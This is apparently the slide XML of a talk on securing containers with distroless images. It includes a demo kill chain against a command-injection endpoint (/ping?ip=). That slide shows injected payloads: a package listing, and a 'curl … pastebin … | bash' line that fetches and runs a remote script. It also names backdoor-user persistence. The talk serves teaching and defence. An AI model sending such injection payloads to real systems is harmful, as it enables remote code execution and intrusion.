y="3201470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B736EE27-FA5D-884F-8ECA-1D70CDC8055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04972" y="4521564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50B67E55-BE08-AD4A-B576-A7D0BC0732F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704975" y="4197471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77459E8E-468B-4945-BB56-E0FAAB8B40A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9997" y="4197471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7D693191-558A-1D49-8217-C2D930487D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007773" y="4525073"/>
            <a:ext cx="4101826" cy="334313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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>subheader</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/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AE3D8A36-A9B3-7C4A-B449-615367FDC9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007776" y="4200980"/>
            <a:ext cx="410182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20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chapter header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203F513A-377D-104F-A5B9-74E9D835A66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2798" y="4200980"/>
            <a:ext cx="624975" cy="426646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 algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="00DBA9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109198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2_Plain text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349E908-A4CA-7D44-A358-C5A13A5E12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9386" y="5876516"/>
            <a:ext cx="10854001" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="8594A7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Footnote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350A91-73F6-E24D-9BBA-CF5921AA30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6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8A02A2B-B509-D74F-984D-62B7A32720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6401" y="930189"/>
            <a:ext cx="7200000" cy="365091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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rgbClr val="060320"/>
                </a:solidFill>
                <a:latin typeface="Equip Extended Light" panose="02000503000000020004" pitchFamily="2" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Edit subtitle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D108A4-41A4-2B43-B692-56C0A943EA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996" y="5261733"/>
            <a:ext cx="2959200" cy="303536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2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E5A8FD-B0E5-E945-A312-AABA78752E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9998" y="4937640"/>
            <a:ext cx="2959200" cy="318924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3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C5699A-28DA-F842-8606-5C140546AB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15200" y="5261169"/>
            <a:ext cx="2959200" cy="303536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2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3F062A2-1692-5747-910B-FA209A37CA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15200" y="4937076"/>
            <a:ext cx="2959200" cy="318924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3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F8BF1F28-5A24-6B4A-9F2D-9905A39903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0400" y="5261169"/>
            <a:ext cx="2959200" cy="303536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200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Equip Light" panose="02000503000000020004" pitchFamily="2" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Edit  Description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3FC7794-AB50-C245-B1FD-C784B1382D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0400" y="4937076"/>
            <a:ext cx="2959200" cy="318924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300" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Equip Extended" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Edit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1CA8CB7-F17B-1B42-95B1-7A9A72C2146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9998" y="4516764"/>
            <a:ext cx="2959200" cy="395869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DBA9"/>
                </a:solidFill>
                <a:latin typeface="Equip Extended ExtraBold" panose="02000603000000020004" pitchFamily="2" charset="77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BA5EBC6-1AA3-0144-957B-06BDCA02A0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5200" y="4516764"/>
            <a:ext cx="2959200" cy="395869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DBA9"/>
                </a:solidFill>
                <a:latin typeface="Equip Extended ExtraBold" panose="02000603000000020004" pitchFamily="2" charset="77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DD53BAA-D440-C94E-B2A1-B78B1087BE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0400" y="4516764"/>
            <a:ext cx="2959200" cy="395869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 marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="00DBA9"/>
                </a:solidFill>
                <a:latin typeface="Equip Extended ExtraBold" panose="02000603000000020004" pitchFamily="2" charset="77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221D190-DA82-8C40-A021-F49C1BA940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79996" y="1605300"/>
            <a:ext cx="10029604" cy="2602800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="060320"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="060320"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="060320"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="060320"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="060320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473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2_Info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46EF3AD-FB46-B34A-8E14-1B37D1952F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1008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Equip Extended" panose="02000503030000020004" pitchFamily="2" charset="77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791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BFE-5662-DB00-2115-9CA800FD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3AC8-93E3-7542-D852-BA08E664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435E-7AA1-1FFE-C678-C22FE3B6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7BB7-704F-647F-BB1E-AE1A28AB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A4A2-2172-E7E6-83DE-59F9770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5C59-621F-0B9A-3869-2CBD635A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42152-2E8D-9F06-D47C-FB8CC4C3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49D2-BB9D-AE06-BFA6-5EBA9B4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5E41-CEEE-1524-F7F6-208A1ABF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D9A4C-147E-47CB-3D64-9724576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F156-91D8-9A43-F283-25B75EE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E2A4-3FBC-1596-E70D-AE294B12A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1E1A-2686-C683-8DB9-1F2F1F91F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461A-1973-5C1F-2826-4BE32F47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B008-C505-44F0-A134-592756D4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7144-95C5-1800-4958-AE66A938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52ED-30C4-2DF8-DA1B-D8E2812B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4994-3C20-9D81-193B-EC12FF11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C958-860B-A571-4821-94BCF9472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CBFA-D72C-6EC0-2048-11DFA2962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67E49-49DA-20DA-5237-7994B690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96AB5-AEAF-02A8-F439-24BF0160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C31BA-296E-A1D3-7791-4A6EB037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5E74C-10B9-B7E2-8198-9C42AFA6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2A52-E387-C0C0-7E5D-A53F686A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90515-8CCF-E28F-5996-2DF9DC9A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0FA2D-54D5-1D9B-2867-4A62355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CB52-5582-B676-2F2E-521ECCE8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02868-70F9-5E4F-F570-736503C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4684-91B7-5153-C1F4-CF39CA72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523EB-581B-5F02-BE1D-32F9826F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217D-153B-836A-ADFE-C4F4827F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1D94-7F1E-D1BD-5BD2-7D395E93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8045F-CE58-DD90-EEE0-A799C68AB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3892C-BE9D-6345-8881-CCF42563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5247-86E9-00BE-32D1-FFC44C6F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DF03-1811-D205-6613-9A571B22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D6B7-0B9C-9577-D911-E0E0B00E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E5615-9860-69C3-7B35-5E16CED16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2F961-6EC5-519B-0722-5FF9796E6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11E9-6B7D-6BB7-7BF7-9AFA8403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9FED-B839-E4C0-CF1E-98C50A16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E55E5-879C-14E4-BBD3-77486D4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C6346-C5A6-BFB1-E93B-232190C1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E8D01-A61B-76C6-5C1D-E0FE8A237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A684-A61C-EA56-6B9F-D326779AA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A2061-2A86-BC4C-BE4E-498E81CE66C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569E-E90D-7E14-301C-37D09920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43BBB-8DCC-52DC-042E-FF9435BDB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413CE-9662-E346-8421-89822D3B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raw/jsBbM758|bash" TargetMode="Externa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haratnanda/from-fat-to-fearless-distroless-way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355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7DB380E-D27A-A828-F50D-A38424651FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611120" y="1333693"/>
            <a:ext cx="9796048" cy="3728950"/>
            <a:chOff x="1222240" y="1408324"/>
            <a:chExt cx="19592096" cy="7457900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58DDB09E-1E71-1C08-A2E3-7CD9BFA56F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1222240" y="1408324"/>
              <a:ext cx="18610080" cy="6001642"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="45720" tIns="22860" rIns="45720" bIns="22860" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1828800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="10800" b="1" i="0" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Equip Extended" panose="02000503030000020004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IN" sz="9600" dirty="0"/>
                <a:t>From Fat to Fearless</a:t>
              </a:r>
              <a:endParaRPr lang="en-PT" sz="5400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Text Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2676A245-BB0B-40C1-DEF8-E5143E6259E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1278772" y="8095450"/>
              <a:ext cx="19535564" cy="770774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" lIns="45720" tIns="54000" rIns="45720" bIns="22860" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="1828800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200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defRPr sz="4000" b="0" i="0" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Equip Extended Thin" panose="02000503030000020004" pitchFamily="2" charset="77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DBA9"/>
                </a:buClr>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
                <a:defRPr sz="3600" b="0" i="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="06041F"/>
                  </a:solidFill>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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3200" b="0" i="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="06041F"/>
                  </a:solidFill>
                  <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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800" b="0" i="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="06041F"/>
                  </a:solidFill>
                  <a:latin typeface="Equip Light" panose="02000503000000020004" pitchFamily="2" charset="77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 b="0" i="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="06041F"/>
                  </a:solidFill>
                  <a:latin typeface="Equip Light" panose="02000503000000020004" pitchFamily="2" charset="77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b="1" dirty="0"/>
                <a:t>Securing containers the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
                <a:t>distroless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
                <a:t> way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5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46EC-4B35-AC78-97E0-B46A567C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AF47-BE4B-0674-18D3-AD1C1452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10080000" cy="549757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>How do attackers attack a container ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2452100-E4C5-3B7E-42B7-C4FB76F7B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956670"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="126790" y="1541511"/>
          <a:ext cx="11938419" cy="432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2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ECECD-47ED-A0F9-4043-3016B3E5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5BDB8E-30B0-664C-3BCE-F592566D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949866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0"/>
              <a:t>Container Vulnerability Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343377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21AC5-849F-67E1-79A0-2E6C91301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1364-F7F9-DC3A-39CD-18CF5A59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10080000" cy="549757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>How one bug becomes a backdoor ?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56FBA-72D2-AE9C-CF94-DF88B87AC2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489753" y="1476103"/>
            <a:ext cx="1133752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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Vulnerable app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Endpoint:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>ping?ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>=&lt;user-supplied&gt;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Bug:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> Input is passed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>directly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> to the shell with no validation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Equip" panose="02000503030000020004" pitchFamily="2" charset="7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Fat – Slim Images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Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>shell, package manager, system utilities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More-tools : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>More ways attacker can exploit vulnerabilities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Equip" panose="02000503030000020004" pitchFamily="2" charset="77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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Killchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> – attack flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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Discover the endpoint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>ping?ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>=127.0.0.1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Execute commands: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Check’s if curl is present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>ping?ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>=127.0.0.1;dpkg --get-selections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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Download &amp; run malicious script: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>ping?ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>=127.0.0.1;curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://pastebin.com/raw/jsBbM758 | bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Persist:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>create backdoor user / install shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187200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C4F6-B04B-D1EF-A556-B5DE4C34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10080000" cy="549757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Demo code and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AC46-AB46-43D0-C34E-1EC213005105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119302" y="1488305"/>
            <a:ext cx="65053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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Demo with explanation is available on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>from-fat-to-fearless-distroless-way</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/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latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>			Or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Scan the QR code to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> repo</a:t>
            </a:r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78F0157-290B-492E-BEFA-98AA264B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6" y="1488305"/>
            <a:ext cx="4016328" cy="40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DE086-F836-63D3-40D0-8845E974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54A98D-43A2-DA79-F1EC-F75F2ECE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949866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0"/>
              <a:t>Defence with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0" err="1"/>
              <a:t>distroless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2453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8F7AA-C1E5-22C8-486E-E0762302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8819-A640-04A5-D3F7-9CB8F7C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10080000" cy="549757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IN" sz="2800" dirty="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>distroless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> enhances the security ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="280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674CE-483E-C121-E331-5C3576E0982F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952970" y="1881052"/>
            <a:ext cx="38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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Reduces Attack Surface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19E79-7ECA-B60E-E97E-27A4FBC89033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678650" y="2468880"/>
            <a:ext cx="5047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No shell available to execute command chains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Fewer system utilities to exploit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Minimal installed packages = fewer vulnerabilities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No package manager, reducing update attack vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Equip" panose="0200050303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45D07-9DD8-4AD0-F1DE-FF8439397EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6538725" y="1881052"/>
            <a:ext cx="3867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IN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Runtime Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004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5EA4B-C04A-2E02-F283-D55561DC45A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217298" y="2468880"/>
            <a:ext cx="5047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No interactive shells available to attackers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No system utilities for reconnaissance or data exfiltration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Non-root by default in many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>distroless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> images</a:t>
            </a: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latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-2857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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>- Minimal process capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Equip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53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D2576-B4E0-D8E7-AEA8-1AA682F6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52E257-FB54-52D2-51B8-02DD72C7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1780863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" dirty="0"/>
              <a:t>Hardening checklist &amp; CI/CD tips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59874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BCE3C-43AF-CC1E-EF23-2068D58C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068-A671-467F-BF63-84BCEF33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Hardening checklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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25DE08F-F4DE-DEC2-4C67-5DF7D6B96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378220"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="836676" y="1211804"/>
          <a:ext cx="10518648" cy="443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57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D675B-CB52-4BA9-80F0-9D91AC854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33B4-AF83-9808-0DBC-F34A6EDD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Tips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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7E6ABD2E-123C-B97D-C9EF-34055426B214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="891540" y="1843950"/>
          <a:ext cx="1040892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12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3D26-67B4-9E64-17F2-4C081F23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C87-1282-E61A-686C-7365E81E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steps to secure workloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67696C94-B4EE-E14C-A4A1-DED6A50833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5123697"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
